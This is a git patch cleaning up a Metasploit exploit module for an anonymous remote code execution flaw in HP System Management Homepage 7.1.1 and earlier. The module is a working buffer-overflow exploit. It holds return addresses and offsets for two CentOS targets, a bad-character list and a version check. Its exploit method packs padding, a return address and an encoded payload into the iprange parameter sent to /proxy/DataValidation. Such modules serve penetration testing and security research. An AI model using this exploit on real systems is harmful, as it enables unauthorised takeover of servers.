From c55a3870a80be86887b71bf9b7972daa16db564c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 29 Mar 2013 18:02:23 +0100 Subject: [PATCH] cleanup for hp_system_management --- .../linux/http/hp_system_management.rb | 85 +++++++++++++------ 1 file changed, 59 insertions(+), 26 deletions(-) diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index c53da64b4b..82b2620f09 100755 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -8,7 +8,9 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking + Rank = NormalRanking + + HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } include Msf::Exploit::Remote::HttpClient @@ -16,56 +18,87 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP System Management Anonymous Access Code Execution', 'Description' => %q{ - This module exploits an anonymous remote code execution on hp system management 7.1.1 and inferior. + This module exploits an anonymous remote code execution on HP System Management + 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on + a request against /proxy/DataValidation. In order to work HP System Management must + be configured with Anonymous access enabled. }, - 'Author' => [ 'agix - @agixid' ], + 'Author' => [ 'agix' ], # @agixid 'License' => MSF_LICENSE, 'Payload' => { 'DisableNops' => true, 'Space' => 1000, 'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20", + 'EncoderOptions' => + { + 'BufferRegister' => 'ESP' # See the comments below + } }, 'Platform' => ['linux'], 'Arch' => ARCH_X86, 'References' => [ - ['URL', 'http://bit.ly/YhjikT'] - ] - 'Targets' => [ - + #['URL', 'http://bit.ly/YhjikT'], + #['OSVDB', 'http://bit.ly/YhjikT'] + ], + 'Targets' => + [ [ 'HP System Management 7.1.1 - Linux (CentOS)', - { - 'Ret' => 0x8054e14, # push esp / ret - 'Offset' => 267 - } + { + 'Ret' => 0x8054e14, # push esp / ret + 'Offset' => 267 + } ], [ 'HP System Management 6.3.0 - Linux (CentOS)', - { - 'Ret' => 0x805a547, # push esp / ret - 'Offset' => 267 - } + { + 'Ret' => 0x805a547, # push esp / ret + 'Offset' => 267 + } ] - ], 'DisclosureDate' => 'Sep 01 2012', 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(2381), + OptBool.new('SSL', [true, 'Use SSL', true]) + ], self.class) + + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/cpqlogin.htm" + }) + + if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ + version = $1 + return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1" + end + + return Exploit::CheckCode::Safe + end + def exploit - padding = rand_text(target['Offset']) + + padding = rand_text_alpha(target['Offset']) ret = [target['Ret']].pack('V') - uri = "/proxy/DataValidation" iprange = "a-bz"+padding+ret+payload.encoded - print_status("Sending #{uri.length} bytes payload...") + + print_status("#{rhost}:#{rport} - Sending exploit...") res = send_request_cgi({ - 'method' => 'GET', - 'uri' => uri, - 'vars_get' => { - 'iprange' => iprange - } - }) - handler + 'method' => 'GET', + 'uri' => "/proxy/DataValidation", + 'encode_params' => false, + 'vars_get' => { + 'iprange' => iprange + } + }) + end end